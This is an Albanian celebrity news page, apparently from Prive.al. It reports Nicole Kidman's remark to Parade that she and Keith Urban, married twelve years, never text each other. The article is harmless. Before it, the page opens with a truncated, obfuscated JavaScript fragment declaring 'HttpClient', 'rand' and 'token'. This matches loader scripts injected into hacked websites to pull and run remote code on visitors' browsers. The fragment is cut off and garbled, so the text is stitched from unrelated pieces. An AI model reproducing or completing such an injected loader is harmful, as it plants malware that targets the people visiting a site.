;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Martesë të lumtur e të gjatë? Bëjani si Nicole Kidman, po mundët

By

Aktorja e famshme australiane Nicole Kidman dhe bashkëshorti i saj Keith Urban, kanë festuar përvjetorin e 12-të të martesës së tyre këtë të hënë dhe sekreti i martesës kaq të gjatë, mund të jetë gati se e pamundur për njerëzit e kësaj kohe.

Kidman ka rrëfyer për revistën Parade, se cka i ka mbajtur kaq gjatë e kaq të lumtur bashkë, se çelësi i Kidman duket të jetë “utopi” për ne.

“Ne nuk dërgojmë kurrë mesazhe me njëri tjetrin”, ka thënë Nicole për Paradë të dielën. “Kjo nuk ndodh në lidhjen tonë.

“Ne preferojmë bisedat ballë për ballë dhe kontaktin fizik para atij me mesazhe. Rregulli ynë për një lidhje pa tekst mesazhe është vendosur që në fillim të romancës tonë në vitin 2005, për shkak se asnjëri nga ne nuk dinim se si të shkruanim në këto platforma”, ka thënë Kidman.

Ajo ka thënë po ashtu: “Ne flasim gjatë tërë kohës e edhe me FaceTime, por vetëm tekst mesazhe nuk dërgojmë për shkak se më duket që përmes fjalëve të shkruara ndodhin keqkuptimeve”, ka deklaruar aktorja, shkruan Vanity Fair, transmeton Prive. /Prive.al

Nicole Kidman

Artikuj të ngjashëm